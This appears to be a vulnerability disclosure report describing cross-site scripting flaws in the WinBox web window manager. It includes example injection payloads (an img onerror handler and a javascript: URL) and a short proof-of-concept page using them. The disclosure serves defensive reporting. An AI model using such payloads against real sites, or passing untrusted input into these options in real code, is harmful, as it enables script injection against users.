winbox

vulnerability cross-site scripting (xss) - generic (cwe-79)
severity 8.8
language javascript
registry other

✍️ Description

Winbox is a Modern window manager for the web: lightweight, outstanding performance, no dependencies, fully customizable, open source!

Winbox lets you create a window with custom HTML in it using :

new WinBox({

    title: "Set innerHTML",
    html: "<h1>Lorem Ipsum</h1>"
});

If the HTML content is user controlled, a malicious user could create a window with malicious HTML content leading to XSS :

new WinBox({

    title: "Set innerHTML",
    html: "<img src='zer0h' onerror=alert(2)>"// XSS
});

There is another parameter that is vulnerable to XSS : You can create a window and open an URL inside that window using :

new WinBox("WinBox.js", {

    url: "https://nextapps-de.github.io/winbox/"
});

It's possible to set an URL like the following : javascript:alert(1);

🕵️‍♂️ Proof of Concept

<head>
    <script src="https://rawcdn.githack.com/nextapps-de/winbox/0.1.8/dist/winbox.bundle.js">
    </script>
</head>
<body>
<script>
new WinBox("WinBox.js", {

    url: "javascript:alert('URL')"
});
new WinBox({

    title: "Set innerHTML",
    html: "<img src='zer0h' onerror=alert('HTML')>"
});
</script>
</body>

💥 Impact

Unintented XSS, you should emphasize in your documentation to not use user input to build your windows as this can lead to XSS.